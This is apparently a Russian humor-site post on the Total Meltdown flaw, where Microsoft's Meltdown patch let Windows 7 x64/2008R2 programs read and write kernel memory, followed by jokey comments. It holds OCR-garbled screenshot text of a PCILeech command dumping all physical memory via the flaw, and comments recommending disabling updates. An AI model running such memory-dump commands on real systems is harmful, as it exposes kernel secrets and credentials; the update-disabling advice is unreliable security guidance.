Патч от Meltdown привел к более критичной уязвимости Windows 7x64/2008R2 / windows 7 :: microsoft :: Meltdown

windows 7 microsoft Meltdown 

Патч от Meltdown привел к более критичной уязвимости Windows 7x64/2008R2

windows 7,microsoft,Meltdown


Патч, закрывающий уязвимость Meltdown привел к более критичной уязвимости систем Windows 7X64 и Windows 2008R2. Уязвимости подвержены системы, обновленные патчами 2018-01 или 2018-02. Уязвимости не подвержены системы, не пропатченные с декабря 2017 года, либо если на них установлен кумулятивный патч 2018-03.


Патч Meltdown от Microsoft открыл еще большую брешь в безопасности в Windows 7/2008, позволяя любому пользовательскому приложению читать содержимое из ядра операционной системы и даже записывать данные в память ядра.


Шведский эксперт по ИТ-безопасности Ульф Фриск обнаружил эту уязвимость, работая над устройством PCILeech, созданном для проведения атак с прямым доступом к памяти (DMA) и дампу защищенной памяти операционной системы.


По словам эксперта, исправление Meltdown от Microsoft (для CVE-2017-5754), случайно перевернуло бит, который контролирует права доступа для памяти ядра. 


as C:\Windows\system32\cmd.exe
Microsoft Windows [Uersion 6.1.76011
Copyright <c> 2009 Microsoft Corporation. fill rights reserved. C:\Users\user>cd c:\pcileech
c:\pcileech>pcileech dump -device totalmeItdown -out none -v -force
TOTfiLMELTDOUN: Successfully exploited for physical memory


Link


Подробнее

as C:\Windows\system32\cmd.exe Microsoft Windows [Uersion 6.1.76011 Copyright <c> 2009 Microsoft Corporation. fill rights reserved. C:\Users\user>cd c:\pcileech c:\pcileech>pcileech dump -device totalmeItdown -out none -v -force TOTfiLMELTDOUN: Successfully exploited for physical memory access. Memory Map: START END «PAGES 0000000000001000 — 000000000009cf f f 0000009c 0000000000100000 - 000000001fffffff 0001ff00 0000000020200000 - 0000000040003fff 0001fe04 0000000040005000 — 00000000cc703fff 0008c6ff 0000000100000000 - 000000021e5 fffff 0011e600 Current fiction: Dumping Memory ficcess Mode: DMfi (hardware only> Progress: 8678 / 8678 <100x> Speed: 4339 MB/s Address: 0X000000021E600000 Pages read: 2009759 / 2221568 <90/> Pages failed: 211809 <9x> Memory Dump: Successful. c:\pcileech> SB Command Prompt Copyright <c> 2009 Microsoft Corporation. All rights reserved. C:\Users\user>cd c:\pcileech c:\pcileech>pcileech dump -device totalmeItdown -out mydump.raw -v -force TOTALMELTDOUN: Successfully exploited for physical memory access. Memory Map: START END «PAGES 0000000000001000 — 000000000009cf f f 0000009c 0000000000100000 - 000000001fffffff 0001ff00 0000000020200000 - 0000000040003fff 0001fe04 0000000040005000 — 00000000cc703fff 0008c6ff 0000000100000000 - 000000021e5 fffff 0011e600 Current Action: Dumping Memory Access Mode: DMA (hardware only> Progress: 8678 / 8678 (100x> Speed: 206 MB/s Address: 0X000000021E600000 Pages read: 2009759 / 2221568 (90/> Pages failed: 211809 (9X> Memory Dump: Successful. \pcileech>
windows 7,microsoft,Meltdown
Еще на тему
Развернуть
Майки утопят всех кто противится прогрессу. "Случайно" или нет.
Ну понятное дело - это специально сделано для того чтобы все переходили на 10, так как 7 "уже ничем не поможешь".
Как же хорошо, что моя 7-ка с 2009 года без обнов...
Как же я тебя понимаю, сам через это прошел, ну что тут сказать держись.
Не понимаю почему люди противятся обновлениям. Я лично сидел на 98, XP, Vista (Хоум уронил на 2й день), 7, 10.
Я обрисую ситуацию
Возьму висту точёную, срублю десятку дрочёную
Я не хвалю Висту, но благодаря ей я очень быстро перешел на 7ку, скажем даже перелетел. Но глупо отрицать опыт, даже негативный.
Как сел на Висту.. сразу окрестил ее "Висрой". И, конечно, 7рка стала как влитая.. может это было так задумано?
хотя врядли.. мелкософт слишком интересная контора, что делает из просой и удобной программы.. нечто.. нечто убогое и крайне трудноюзабельное.
А чем конкретно всем виста не нравится, просто у меня её не было, дел с ней не имел
Виста - публичная бэта семёрки, вот только за бэтатест обычно платит производитель, а тут сделали хитрый финт ушами и платили тестеры
наглый пиздеж про висту.
А что ты думаешь про проект Windows Longhorn?
Что у тебя сейчас эта система стоит и ты на нее наглядеться не можешь
У меня ноут 10 не потянет.
Если тянул семёрку - потянет и десятку, для ноутов которые не тянут семёрку существует хр.
Потому что это мой выбор. Мне на винде нужен довольно ограниченый набор программ и обновы не нужны.
Конечно, офис 2003 и сапёр вполне рабочий.
Рабочий. А самое гланое, что все работает без глюков и я знаю за что отвечает каждая кнопочка. Последний раз, когда я обновлял винду, у меня выскочил синий экран. Оказалось, что разработчики накосячили с дровами для моего железа. А когда я ставил себе более новую Visual Studio, то она потянула с собой несколько гигов зависимостей и какую-то телеметрию. И последняя капля - они удалили сапера со стандартных приложений. В последних версиях винды его нужно качать с Microsoft Store.
Прочел голосами Уивинга и Киану
присоединяюсь, а ещё я отключил обновы полностью, но она сама по тихой както да скачала обнов на хуилион гигов, да еще и иконка теперь обновы навечно висит в углу СУУУУУУУУУКААААААААААААА!
Через политики помогает но не всегда, логика мне не ясна т.к. на 30 компах с этой темой обновы не все одинаковые

Нажмите Win + R.
Введите gpedit.msc и нажмите Enter.
Нажмите "Конфигурация компьютера".
Выберите "Административные шаблоны".
Нажмите "Все параметры".
Прокрутите вниз до пункта "Настройка автоматического обновления" и дважды щелкните запись.
Выберите "Включено" в верхнем левом углу.
Выберите "Уведомлять о загрузки и автоматической установки".
Нажмите "Применить".

если политик нет и у тебя хоум, то сочувствую, реестр не помогает.
Я упрлс и мысли в текст сложно переносить, но через политики ваще огонь
>если политик нет и у тебя хоум, то сочувствую

Не надо сочувствовать, надо советовать запустить батник со следующим содержимым:

@echo off
pushd "%~dp0"

dir /b %SystemRoot%\servicing\Packages\Microsoft-Windows-GroupPolicy-ClientExtensions-Package~3*.mum >List.txt
dir /b %SystemRoot%\servicing\Packages\Microsoft-Windows-GroupPolicy-ClientTools-Package~3*.mum >>List.txt

for /f %%i in ('findstr /i . List.txt 2^>nul') do dism /online /norestart /add-package:"%SystemRoot%\servicing\Packages\%%i"
pause

После этого gpedit заработает.
Это точно не канал про аниме?
Сразу пропатчить захотелось?
Блять, что я делаю не так? Качал несколько разных репаков, ни один ни разу не обновлялся
>>случайно перевернуло бит
Не, ну а чо, мы обнаружили уязвимость, но мы вам её принудительно пропатчим на заранее известную уязвимость с понижением производительности за ваши деньги, и ой, мы случайно!
Не, кстати вполне возможно. Вот прямо на предыдущей неделе произошёл случай - приехали чуваки для накладки частотников. Там в микролоджиксе нужно было допилить программу, так наладил перепутал xic и xio инструкции. В итоге весь день ебались со словами "а хуле частотников не шлёт месаги?" дак ещё подобный косяк ещё и хуй найдешь беглым просмотром
*наладчик. Клятi т9
Я вообще "передернуло" прочитал.
Время переустанавливать шиндовс!
Как же они заебали
Бтв есть ли инструкция на полный запрет обновления десятки? Разные шаманства с политиками не возымевают успеха, ссаная десятка сызнова возвращается к дефолтным настройкам апдейтов. И да, да, я знаю, что отключение обновления карается гиперссылкой в Сибирь и принудительной кастрацией
Ставишь права на папку windows10upgrade в корне диска С только на чтение и система лососнет тунца когда попытается туда что-то записать.
Все гораздо проще. Оставляете на системном диске хуй с немногим места и, как говорит наш сторож, вуаля!
Странно, я через политики поставил обновление по желанию, вручную обновляю время от времени. Еще можно поставить LTSB (long term support branch) - никакой хунйни, в виде картаны, эджа, стандартных говноприложений и прочей хуйни.
Как мы добавили уязвимость в вашу уязвимость
Только монитор забыли прихуярить.
>Шведский эксперт по ИТ-безопасности Ульф Фриск

Во время исследований он определённо ощущал решимость.
Ульф Фриск Буревестник
блять, еще б виндовс 3.1 пользовались.
На работе 7-ка, обновляться не стал, двое коллег обновились, через полгода откатились обратно на 7
Только зарегистрированные и активированные пользователи могут добавлять комментарии.
Похожие темы

Похожие посты
KRACK Attacks: Bypassing WPA2 against Android and Linux,Science & Technology,krackattacks,nonce reuse,krack,key reinstallation attack,wifi,Wi-Fi,wpa,wpa2,4-way handshake,Based on the CCS 2017 paper "Key Reinstallation Attacks: Forcing Nonce Reuse in WPA2". Note that other devices are harder to
подробнее»

wpa2 wi-fi уязвимость решето андроид-дно geek,Прикольные гаджеты. Научный, инженерный и айтишный юмор

KRACK Attacks: Bypassing WPA2 against Android and Linux,Science & Technology,krackattacks,nonce reuse,krack,key reinstallation attack,wifi,Wi-Fi,wpa,wpa2,4-way handshake,Based on the CCS 2017 paper "Key Reinstallation Attacks: Forcing Nonce Reuse in WPA2". Note that other devices are harder to
Игра ало-като. ]